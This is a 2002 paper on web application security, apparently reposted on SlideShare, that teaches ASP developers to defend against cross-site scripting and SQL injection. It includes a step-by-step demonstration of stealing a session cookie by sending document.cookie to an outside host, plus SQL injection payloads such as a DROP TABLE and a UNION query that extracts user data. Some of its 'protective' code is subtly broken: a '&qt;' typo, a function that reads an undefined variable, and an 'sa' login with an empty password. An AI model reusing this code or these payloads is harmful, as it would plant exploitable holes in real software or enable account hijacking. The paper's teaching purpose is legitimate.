SlideShare a Scribd company logo

Web Application Security

Chris x-MS
Chris x-MS
Technology
1 of 14
Download to read offline
Web Application Security namics ag Patrice Neff July 17, 2002 Abstract Bugtraq is floated with Web bugs, especially cross-site scripting (XSS) and SQL injection problems. A while ago a friend mailed me a link at sunrise.net, revealing the SQL Server version. Theoretically many ASP programmers know, that input validation is re- quired. With this paper I want to show you exactly why this should be done and give you some tools to ease this effort. The code samples are all written for VBScript. This document only covers the security threats that Web developers can fix. 1
Contents 1 Cross-Site Scripting 3 1.1 Protection: Approach I Filter HTML Characters . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.2 Protection: Approach II Only Allow a Limited Character Set . . . . . . . . . . . . . . . . . . . . 4 1.3 Protection: Approach III Safely Allow Some Tags . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.4 Common Pitfalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2 SQL Injection 6 2.1 Protection: Approach I Filter characters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 2.2 Protection: Approach II ADODB Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3 Attack Demonstration 7 3.0.1 Set up/look for a page to log cookies . . . . . . . . . . . . . . 7 3.0.2 Create a JavaScript . . . . . . . . . . . . . . . . . . . . . . . 7 3.0.3 Inject the script . . . . . . . . . . . . . . . . . . . . . . . . . 8 3.0.4 Break the session . . . . . . . . . . . . . . . . . . . . . . . . . 8 4 Solutions 8 4.1 Some Ideas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.2 ASP Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3 Checker Tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3.1 Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 4.4 Configuration Changes . . . . . . . . . . . . . . . . . . . . . . . . . . 9 A ASP Functions Code 9 B Regular Expressions 11 C Checker Tool Code 11 D Example for ADODB.Command 13 References 14 2
1 Cross-Site Scripting Cross-site scripting (XSS) is a threat where the attacker can inject code into a Web application which gets executed at the visitor’s site. This is possible whenever the input of the user gets displayed on the Web site again, for example in guest books. This attack form can be used to exploit browser bugs like buffer overflows and ActiveX flaws or to steal cookies (see section 3). 1.1 Protection: Approach I Filter HTML Characters The simplest approach to disable cross-site scripting is the filtering of HTML char- acters. > → &gt; < → &lt; ” → &quot; & → &amp; If you put this sanitized code in an HTML environment it should keep you save from cross-site scripting bugs. But imagine this code: <% Function cHtml(str) s = str s = Replace(s, "&", "&amp;") s = Replace(s, ">", "&qt;") s = Replace(s, "<", "&lt;") s = Replace(s, """", "&quot;") cHtml = s End Function str = cHtml(Request("str")) %> <html> <head> <title>custom JavaScript</title> <script language="JavaScript"> function cmsg() { alert(’custom message: <%=str%>’); } </script> </head> <body onload="cmsg()"> This displays a custom message on page load. </body> </html> This allows a lot of query strings that don’t include any “forbidden charac- ters”. For example this query string would redirect every visitor to my Web site: str=Welcome!’);location.href=’http://www.patrice.ch/’;// So always check if you really have replaced all characters that can be used to escape the current environment. In the example above this would at least include the single quote. You should also escape the backslash in JavaScript, as it might be possible to abuse it. 3
1.2 Protection: Approach II Only Allow a Limited Character Set The first approach works quite well if you want to disallow any HTML. But from a security point of view it’s far from ideal, because it only forbids the characters that are dangerous today. With the next great browser there might be some other way to inject a script into the page. So it’s recommended to allow only a minimal set of characters. For example only letters, numbers and newlines. This code works fine to disable any character not included in the constant allowed. It also allows newlines. ’ Replace all evil characters Function cHtml(ByVal s) Dim i Dim snew Const allowed="abcdefghijklmnopqrstuvwxyz" & _ "ABCDEFGHIJKLMNOPQRSTUVWXYZ" & _ "0123456789¨a¨o¨u¨A¨O¨U .,!:;" & vbCrLf snew="" For i = 1 To Len(s) If Instr(1, allowed, Mid(s, i, 1))>0 Then snew = snew & Mid(s, i, 1) End If Next cHtml = snew End Function I have implemented this approach with the function limitStr in appendix A. 1.3 Protection: Approach III Safely Allow Some Tags If you really want to allow the user to insert HTML tags, the most secure way for this is to first sanitize all data using approach I (see section 1.1) and then re-replace all allowed tags. For example: <% Function cHtml(str) s = str s = Replace(s, "&", "&amp;") s = Replace(s, ">", "&qt;") s = Replace(s, "<", "&lt;") s = Replace(s, """", "&quot;") cHtml = s End Function Function htmlIze(str) Dim s s = cHtml(str) ’ Allowed tags, b, i, u 4
s = Replace(s, "&lt;b&gt;", "<b>", 1, -1, 1) s = Replace(s, "&lt;/b&gt;", "</b>", 1, -1, 1) s = Replace(s, "&lt;i&gt;", "<i>", 1, -1, 1) s = Replace(s, "&lt;/i&gt;", "</i>", 1, -1, 1) s = Replace(s, "&lt;u&gt;", "<u>", 1, -1, 1) s = Replace(s, "&lt;/u&gt;", "</u>", 1, -1, 1) htmlIze = s End Function str = htmlIze(Request("str")) %> <html> <head> <title>htmlIze</title> </head> <body> This was your text: <p><%=str%></p> </body> </html> 1.4 Common Pitfalls Case sensitivity If you replace strings, replace everything case insensitive. The Replace function has a parameter for this. The last argument defines, whether to compare the strings binary (0) or as text (1): s = Replace(s, "<script>", "", 1, -1, 1) Note: I don’t recommend to only replace some “hostile” tags, because this approach is very risky and prone to changes in the browsers. Additionally you will most probably miss a few tags or attributes. So if you really need to allow the user to insert some tags, see section 1.3. Newlines When you want to strip out single tags, make sure that you also replace them over newlines. Assume this script: s = Request("str") s = Replace(s, "<script>", "", 1, -1, 1) Response.Write str The intention is to remove every occurrence of the tag “script”, it’s even case insensitive. Now this can be circumvented with this query string: str=%3Cscript%0D%0A%3Ealert(’testing’)%3C%2Fscript%3E Or to make it more human readable: str=<script[newline]>alert(’testing’)</script> There is now a newline (%0D%0A) right before the closing bracket. As HTML ignores this newline, the script will execute. To fix this vulnerability, this code can be used: s = Request("str") ’ replace newline combinations 5
s = Replace(s, "<" & vbCr, "<") s = Replace(s, "<" & vbLf, "<") s = Replace(s, vbLf & ">", ">") s = Replace(s, vbCr & ">", ">") s = Replace(s, "<script>", "", 1, -1, 1) Response.Write str Note: Again, I discourage replacing some tags because you will most prob- ably miss some. See section “Newlines” for a more thorough discussion. Check all data Make sure that you really check all supplied data. A common problem is, that the form data is cleansed before displaying on the page, but the database data isn’t. The best approach to prevent that kind of problems is to define for every table whether the data in it is sanitized or not. So the developers know when they have to HTML-ize the data: either when putting it into the table or when using it for HTML output. I recommend you to protect all data against SQL injection directly when getting the input from the client. If you follow this approach you can use the checker script to check your code for bugs. See section 4.3 for information. But when I use approach 1, I usually protect against XSS when displaying the content. One reason for this is, that this way I can use the same data for displaying on a HTML page and for sending in mails, etc. 2 SQL Injection Now to the more dangerous part: SQL injection. This is a technique which allows the attacker to execute malicious SQL statements. With the help of xp_cmdshell it’s even possible to execute system commands if the database is accessed as ’sa’. This bug exists whenever you use unvalidated data that has been submitted by the client to perform a database query. Let’s take this SQL-Statement, where the string “TERM” can be submitted by the visitor. SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ’%TERM%’ The client could craft the term to drop the table T News: SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ’%’; DROP TABLE T_News --’ Yes, this is possible. Just submit ’; DROP TABLE T_News -- as the search term. First the WHERE clause is closed with the single quote, and then we can start the next statement with the semicolon. The two dashes at the end start a comment, so the single quote which the developer has inserted after the user’s input doesn’t produce a syntax error. It’s also possible to select any other data and display it instead of the News which the developer wanted to display on this page. You can use the UNION statement for that. The only requirement is that both queries return the same number of columns and the same data type in each column. If necessary use CONVERT to achieve that. [1] shows a trick how you can find out how many rows are included in the query using the HAVING clause. One example for a UNION crack: 6
SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ’%DOESNOTEXIST’ UNION SELECT UserId, UserName FROM T_User --%’ 2.1 Protection: Approach I Filter characters Luckily this attack is much easier to protect against than cross-site scripting. Make sure to remove or escape all single quotes in string parameters1 . Additionally enforce that any numeric input is really numeric using the IsNumeric function call. The ASP functions (see section 4.2) include some generic functions to prevent you from SQL injection attacks if you use them every time. The numeric and date functions check if the input data is valid and then explicitly convert them with CInt, CLng, CDate, etc. 2.2 Protection: Approach II ADODB Command There is another approach which is very safe but more work to implement[12]. You can use ADODB prepared statements to automatically sanitize the data. See appendix D for an example. Please note, that in the example I have checked the numeric parameters. This isn’t strictly required, but if you let it out you get some nasty error messages: “Application uses a value of the wrong type for the current operation.”. 3 Attack Demonstration This is the procedure how a cross-site scripting attack could take place. It demon- strates how to steal a cookie. For the session handling, IIS sets a cookie named “ASPSESSION...”. It’s quite impossible to guess the name and the value. But it’s possible to steal this cookie. When you get a SessionID you can pass it to the server and then you own that session. I’ll give you a step by step guide. 3.0.1 Set up/look for a page to log cookies You first have to get some possibility to log the stolen cookies. This may be an ASP page on your own server that logs the query string to a file. Another possibility would be use the query string needed to create an entry in some guestbook. Let’s assume the URL to create a guestbook entry is http://some.host/xtgbadd.asp?user=cookie&msg=MESSAGE 3.0.2 Create a JavaScript Next you need to create a script to inject. This should redirect to the URL re- searched above inserting the message. For example: <script> location.href=’http://some.host/xtqbadd.asp?user=cookie&msg=’ + 1The exact protection approach depends on the database server. For Microsoft SQL Server it suffices to double all single quotes. For other database systems you would have to put a backslash before every single quote or escape some other characters. Consult the manual of your database or ask your vendor for details. 7
document.cookie </script> 3.0.3 Inject the script Now inject the created script into the targeted page. For example you could inject it into a session-based ASP forum or guestbook. 3.0.4 Break the session I assume you had at least one victim. Get the cookie from your log file (or wherever it is stored) and extract the ASPSESSIONID cookie. For example: ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK Then you connect to the Web server and use this command. (End with two newlines) GET /$TARGETSITE HTTP/1.1 Host: $WEBSERVER Connection: Close Cookie: ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK 4 Solutions 4.1 Some Ideas There are a number of ideas to fix this two security problems. The basic approach is to create a library of ASP functions which can be used without much hassle. The advantage of this is that it can be used very easily. But it’s not the best way, because you need to think of it every time you read some request. The one and only place where you forget to use this functions might be the door for an attacker. The other major disadvantage is that this requires a system for code sharing to ensure that every Web application uses current functions. Combined with the ASP functions it’s possible to create a checker tool that reads the source files on the server and tries to detect the parameters which aren’t checked. This could even be automated using command line options and/or a configuration file. Another idea that floated around in my head was to create an ISAPI filter, so that you don’t have to rewrite the applications. This would be a great advantage, but it has some disadvantaged. The most serious problem is the fact that in the ISAPI filter you can’t know whether to protect this query against SQL injection or cross-site scripting. As we have seen, both need different filtering. It might be possible to solve this using some configuration files. I have decided not to dig into this for the moment, because it would be quite time consuming. As I find the idea of the checker tool very sexy I decided to implement the ASP functions and a checker tool. 4.2 ASP Functions Appendix A shows the code for an include file that provides the necessary func- tions to protect against XSS and SQL injection. cHtml protects against cross-site scripting using the approach 1 (see section 1.1). The functions starting with the letter“n”(you guessed it,“n”stands for“new”) are equivalents for the corresponding VBScript function, e.g. CInt or CStr. 8
4.3 Checker Tool When using the ASP functions it’s crucial that they are used every time when you process request data. The one single request where you forget that can be the wide open door for an attacker. I created a prototype of such a checker tool. The idea is to get a list of the vulnerable files so that they can be fixed. It is written in Perl because Perl is great for rapid development and provides great string functions. It is also available for the Microsoft Windows platforms. 4.3.1 Algorithm 1. Find statement which reads request data 2. Does the data get sanitized using one of the ASP functions? 3. If no, mark the line as vulnerable 4. Continue until end of file The code is presented in appendix C. 4.4 Configuration Changes There are some configuration changes that can be done to restrict the attackers when exploiting SQL injection bugs. First you can tell IIS not to give detailed error messages when an error occurs. So it gets a lot harder, though by far not impossible. Additionally you should remove all extended stored procedures. With them it’s possible to harm the whole system. For example with xp cmdshell it’s possible to add users, delete files, put files on the server, ... A ASP Functions Code This is the code for the include file with the ASP functions discussed in section 4.2. <% ’------------------------------------------------------------------- ’ Functions to sanitize the client input. ’ ’ Protect against cross-site scripting and SQL injection ’ ’ HELP: What functions shall I use? ’ - If you have some data that you want to display on a HTML page, ’ use cHtml. It escapes any HTML input so it protects you ’ against cross-site scripting. ’ - If you’re using the data for database queries, use the n* ’ functions: ’ - nInt, nDbl, nLng ’ This functions check if the input data is numeric and ’ convert it. If the data is invalid, they return 0. ’ - nStr ’ Replaces the single quotes in strings. So SQL injection is ’ not possible. ’ ’ Copyright 2002, Patrice Neff, namics ag 9
’ Placed in the GPL license. ’------------------------------------------------------------------- Function cHtml(value) s = str s = Replace(s, "&", "&amp;") s = Replace(s, ">", "&qt;") s = Replace(s, "<", "&lt;") s = Replace(s, """", "&quot;") cHtml = s End Function Function nInt(value) If IsNumeric(value) Then nInt = CInt(value) Else nInt = 0 End If End Function Function nDbl(value) If IsNumeric(value) Then nDbl = CDbl(value) Else nDbl = 0.0 End If End Function Function nLng(value) If IsNumeric(value) Then nLng = CLng(value) Else nLng = 0 End If End Function Function nStr(value) Dim s: s = value s = Replace(s, "’", "’’") s = Replace(s, "‘", "’’") nStr = s End Function ’ Constants for limitStr Const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" Const alphnum = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" Function limitStr(value, limitset) Dim s: s = "" Dim i 10
For i = 1 To Len(value) If InStr(1, limitset, Mid(value, i, 1))>0 Then s = s & Mid(value, i, 1) End If Next limitStr = s End Function ’ Currently does nothing. Provided for the checker tool and might be ’ required in the future Function mailVal(value) mailVal = value End Function ’ Required for cases where the string doesn’t have to be sanitized ’ e.g.: If Request.QueryString<>"" Then Function ignVal(value) ignVal = value End Function %> B Regular Expressions This are some examples for validation using Regular Expressions[8]. Regular ex- pressions are far more powerful than the simple replace functions in appendix A but also more complex to write. ’Generic function to validate strings using regular expressions Function fncStringValid(strInput, strPattern) Dim MyRegExp Set MyRegExp = New RegExp MyRegExp.Pattern = ">" & strPattern & ">" fncStringValid = MyRegExp.Test(">" & strInput & ">") End Function ’Phone validation Function fncPhoneValid(strInput) fncPhoneValid = fncStringValid(strInput, "0[0-9]{8,14}") End Function ’Mobile phone validation Function fncMobileValid(strInput) fncMobileValid = fncStringValid(strInput, "07[689][0-9]{7}") End Function ’email validation 11
Function fncEmailValid(strInput) fncEmailValid = fncStringValid(strInput, "[w.-]+@[w.-]+(.(w)+)+") End Function C Checker Tool Code #!/usr/bin/perl -w # This script can be used to check if an ASP file is protected # against cross-site scripting and SQL injection. It only works # for VBScript files. # # Algorithm: # 1. Find a statement which gets data from the client # E.g.: - Request.Form(..) # - Request.QueryString(..) # - Request.Cookies(..) # - Request(..) # 2. Check if the requested data is sanitized with one of the ASP # functions: # - nStr, nInt, nDbl, nLng # - htmlConv, limitStr, mailVal, ignVal # 3. If not, print an error # 4. Continue at step 1 # # Copyright 2002, Patrice Neff, namics ag # Placed in the GPL license. use strict; my ($version, $date, $prog) = ("0.1", "June 05, 2002", "AspSecCheck"); # the functions which can read client data my @clrfuncs = qw(Request Request.Form Request.QueryString Request.Cookies); # the recognized ASP functions that can be used to sanitize data my @aspfuncs = qw(nStr nInt nDbl nLng htmlConv limitStr mailVal ignVal); ### process input my $depth=0; # current brackets depth my $sawfunc=-1; # level where we’ve last seen one of the aspfuncs my $line=0; # the current line number my $errors=0; # number of problems found my $incomment=0; # true if inside a comment while (<>) { $line++; while (/((w+([w.]+))|)|(|’)/g) { if ($1 eq "(") { $depth++ unless $incomment; } elsif ($1 eq ")") { $depth-- unless $incomment; 12
$sawfunc=-1 if $sawfunc>$depth; } elsif ($1 eq "’") { $incomment=1; } else { $sawfunc=$depth if (not $incomment and grep(/^$1$/i, @aspfuncs)); if (grep(/^$1$/i, @clrfuncs) and $sawfunc<0 and not $incomment) { print " line: $line, word: $1n"; $errors++; } } } $incomment=0; } print "$errors unchecked variables found!n"; D Example for ADODB.Command <!--METADATA NAME="Microsoft ActiveX Data Objects 2.5 Library" TYPE="TypeLib" UUID="{00000205-0000-0010-8000-00AA006D2EA4}"--> <!--#include file="secur_funcs.asp"--> <html> <head> <title>login</title> </head> <body> <% strUsername = Request.Form("username") strPassword = Request.Form("password") intId = Request("id") If Request.ServerVariables("CONTENT_LENGTH")>0 Then strSQL = "SELECT Count(*) AS c FROM users WHERE " & _ "uname=? and pwd=? and id=?" strConn = "Provider=SQLOLEDB;Data Source=(local);" & _ "Initial Catalog=testweb;User Id=sa;Password=" Set cmd = Server.CreateObject("ADODB.Command") With cmd .CommandText = strSQL .CommandType = adCmdText .Parameters.Append .CreateParameter("", adVarChar, _ adParamInput, 50, strUsername) .Parameters.Append .CreateParameter("", adVarChar, _ adParamInput, 50, strPassword) .Parameters.Append .CreateParameter("", adInteger, _ adParamInput, , intId) .ActiveConnection = strConn Set rs = .Execute() End With If rs("c")=1 Then Response.Write "You’re logged in" Else Response.Write "Invalid login" 13
End If Else %> <form action="sql_command.asp" method="post"> Name: <input type="text" name="username"><br> Pass: <input type="text" name="password"><br> Id: <input type="text" name="id"><br> <input type="submit"> </form> <% End If %> </body> </html> References [1] Chris Anley. Advanced SQL injection in SQL server applications. http:// www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002. 6 [2] Chris Anley. More advanced SQL injection in SQL server applications. http: //www.nextgenss.com/papers/more_advanced_sql_injection.pdf, 2002. [3] CERT. Advisory CA-2000-02 malicious HTML tags embedded in client Web requests. http://www.cert.org/advisories/CA-2000-02.html, February 2000. [4] CERT. Understanding malicious content mitigation for Web developers. http: //www.cert.org/tech_tips/malicious_code_mitigation.html/, February 2000. [5] Cgisecurity.com. The cross site scripting faq. http://www.cgisecurity.com/ articles/xss-faq.shtml, May 2002. [6] SPI Dynamics. Web applications and SQL injection. http://www. spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf. [7] eyeonsecurity Inc. Extended html form attack. http://eyeonsecurity.net/ papers/Extended%20HTML%20Form%20Attack.htm, January 2002. [8] Jeffrey E. F. Friedl. Mastering Regular Expressions. O’Reilly & Associates, Inc., 103a Morris Street, Sebastopol, CA 95472, USA, Tel: +1 707 829 0515, and 90 Sherman Street, Cambridge, MA 02140, USA, Tel: +1 617 354 5800, 1997. 11 [9] iDEFENSE. Evolution of cross-site scripting attacks. http://www.idefense. com/XSS.html, May 2002. [10] SecurityFocus. Bugtraq mailinglist. http://online.securityfocus.com/ archive/1. [11] sqlsecurity.com. SQL injection FAQ. http://www.sqlsecurity.com/ DesktopDefault.aspx?tabindex=2&tabid=3. [12] Christoph Wille. Gegengifte f¨ur SQL injection. http://www.aspheute.com/ artikel/20011031.htm, April 2001. 7 14

Recommended

Web Security
Web SecurityWeb Security
Web SecuritySupankar Banik
 
Rails and security
Rails and securityRails and security
Rails and securityAndrey Tokarchuk
 
Exception handling
Exception handlingException handling
Exception handlingMahesh Pachbhai
 
Static Analysis of Mozilla Thunderbird's Code by PVS-Studio
Static Analysis of Mozilla Thunderbird's Code by PVS-StudioStatic Analysis of Mozilla Thunderbird's Code by PVS-Studio
Static Analysis of Mozilla Thunderbird's Code by PVS-StudioPVS-Studio
 
Javascript Deofuscation A manual Approach
Javascript Deofuscation A manual ApproachJavascript Deofuscation A manual Approach
Javascript Deofuscation A manual ApproachGregory Hanis
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthroughAhmed Elhady Mohamed
 
Android session-5-sajib
Android session-5-sajibAndroid session-5-sajib
Android session-5-sajibHussain Behestee
 

Recommended

Web Security
Web SecurityWeb Security
Web SecuritySupankar Banik
 
Rails and security
Rails and securityRails and security
Rails and securityAndrey Tokarchuk
 
Exception handling
Exception handlingException handling
Exception handlingMahesh Pachbhai
 
Static Analysis of Mozilla Thunderbird's Code by PVS-Studio
Static Analysis of Mozilla Thunderbird's Code by PVS-StudioStatic Analysis of Mozilla Thunderbird's Code by PVS-Studio
Static Analysis of Mozilla Thunderbird's Code by PVS-StudioPVS-Studio
 
Javascript Deofuscation A manual Approach
Javascript Deofuscation A manual ApproachJavascript Deofuscation A manual Approach
Javascript Deofuscation A manual ApproachGregory Hanis
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthroughAhmed Elhady Mohamed
 
Android session-5-sajib
Android session-5-sajibAndroid session-5-sajib
Android session-5-sajibHussain Behestee
 
Lecture 5 - Comm Lab: Web @ ITP
Lecture 5 - Comm Lab: Web @ ITPLecture 5 - Comm Lab: Web @ ITP
Lecture 5 - Comm Lab: Web @ ITPyucefmerhi
 
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionPreventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionStefano Di Paola
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
JAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
JAVASCRIPT TDD(Test driven Development) & Qunit TutorialJAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
JAVASCRIPT TDD(Test driven Development) & Qunit TutorialAnup Singh
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...adonatwork
 
PVS-Studio vs Chromium. 3-rd Check
PVS-Studio vs Chromium. 3-rd CheckPVS-Studio vs Chromium. 3-rd Check
PVS-Studio vs Chromium. 3-rd CheckAndrey Karpov
 
Efficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template EnginesEfficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template Enginesadonatwork
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSДмитрий Бумов
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
The Little Unicorn That Could
The Little Unicorn That CouldThe Little Unicorn That Could
The Little Unicorn That CouldPVS-Studio
 
Uses & Abuses of Mocks & Stubs
Uses & Abuses of Mocks & StubsUses & Abuses of Mocks & Stubs
Uses & Abuses of Mocks & StubsPatchSpace Ltd
 
Javascript conditional statements
Javascript conditional statementsJavascript conditional statements
Javascript conditional statementsnobel mujuji
 
Automated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeAutomated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeVladimir Kochetkov
 
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgeChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgePVS-Studio
 
Coding Ajax
Coding AjaxCoding Ajax
Coding AjaxTed Husted
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Linux version of PVS-Studio couldn't help checking CodeLite
Linux version of PVS-Studio couldn't help checking CodeLiteLinux version of PVS-Studio couldn't help checking CodeLite
Linux version of PVS-Studio couldn't help checking CodeLitePVS-Studio
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Our lady ransom prospectus
Our lady ransom prospectusOur lady ransom prospectus
Our lady ransom prospectusolorhead
 
DS Technicolor DWG850-4B
DS Technicolor DWG850-4BDS Technicolor DWG850-4B
DS Technicolor DWG850-4BChris x-MS
 

More Related Content

What's hot

Lecture 5 - Comm Lab: Web @ ITP
Lecture 5 - Comm Lab: Web @ ITPLecture 5 - Comm Lab: Web @ ITP
Lecture 5 - Comm Lab: Web @ ITPyucefmerhi
 
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionPreventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionStefano Di Paola
 
JAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
JAVASCRIPT TDD(Test driven Development) & Qunit TutorialJAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
JAVASCRIPT TDD(Test driven Development) & Qunit TutorialAnup Singh
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...adonatwork
 
PVS-Studio vs Chromium. 3-rd Check
PVS-Studio vs Chromium. 3-rd CheckPVS-Studio vs Chromium. 3-rd Check
PVS-Studio vs Chromium. 3-rd CheckAndrey Karpov
 
Efficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template EnginesEfficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template Enginesadonatwork
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
The Little Unicorn That Could
The Little Unicorn That CouldThe Little Unicorn That Could
The Little Unicorn That CouldPVS-Studio
 
Uses & Abuses of Mocks & Stubs
Uses & Abuses of Mocks & StubsUses & Abuses of Mocks & Stubs
Uses & Abuses of Mocks & StubsPatchSpace Ltd
 
Javascript conditional statements
Javascript conditional statementsJavascript conditional statements
Javascript conditional statementsnobel mujuji
 
Automated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeAutomated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeVladimir Kochetkov
 
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgeChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgePVS-Studio
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Linux version of PVS-Studio couldn't help checking CodeLite
Linux version of PVS-Studio couldn't help checking CodeLiteLinux version of PVS-Studio couldn't help checking CodeLite
Linux version of PVS-Studio couldn't help checking CodeLitePVS-Studio
 

What's hot (19)

Lecture 5 - Comm Lab: Web @ ITP
Lecture 5 - Comm Lab: Web @ ITPLecture 5 - Comm Lab: Web @ ITP
Lecture 5 - Comm Lab: Web @ ITP
 
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionPreventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code Execution
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
JAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
JAVASCRIPT TDD(Test driven Development) & Qunit TutorialJAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
JAVASCRIPT TDD(Test driven Development) & Qunit Tutorial
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
 
PVS-Studio vs Chromium. 3-rd Check
PVS-Studio vs Chromium. 3-rd CheckPVS-Studio vs Chromium. 3-rd Check
PVS-Studio vs Chromium. 3-rd Check
 
Efficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template EnginesEfficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template Engines
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
Front end-security
Front end-securityFront end-security
Front end-security
 
The Little Unicorn That Could
The Little Unicorn That CouldThe Little Unicorn That Could
The Little Unicorn That Could
 
Uses & Abuses of Mocks & Stubs
Uses & Abuses of Mocks & StubsUses & Abuses of Mocks & Stubs
Uses & Abuses of Mocks & Stubs
 
Javascript conditional statements
Javascript conditional statementsJavascript conditional statements
Javascript conditional statements
 
Automated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeAutomated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source Code
 
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft EdgeChakraCore: analysis of JavaScript-engine for Microsoft Edge
ChakraCore: analysis of JavaScript-engine for Microsoft Edge
 
